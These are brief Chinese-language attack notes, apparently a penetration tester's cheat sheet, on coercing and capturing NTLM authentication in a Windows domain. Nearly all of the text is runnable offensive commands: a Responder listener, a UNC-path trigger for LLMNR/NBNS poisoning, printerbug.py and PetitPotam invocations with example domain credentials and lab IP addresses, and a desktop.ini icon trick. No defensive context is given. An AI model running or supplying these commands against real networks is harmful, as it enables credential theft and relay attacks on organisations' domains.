1. Responder监听
sudo ./Responder.py -I eth0 -wv
2. 触发NTLM请求
0x01. LLMNR && NBNS协议
win+R : //asdasdasd
0x02. 打印机漏洞
krbrelayx下的printerbug.py:
注意,这个凭据不是DC的,只要是个域用户都可以。@后面是攻击目标,后一个ip是responder的ip。
python3 printerbug.py intranet/win2008:1q2w3eQWE@192.168.72.131 192.168.72.128
0x03. PetitPotam
这个的话,responder的ip写前面,攻击的目标ip写后面:
python3 PetitPotam.py -d intranet.com -u win2008 -p 1q2w3eQWE 192.168.72.128 192.168.72.131
0x04. 图标
太多了。。。就记一个desktop.ini的好了。
改 desktop.ini即可:
然后访问test文件夹,即可触发。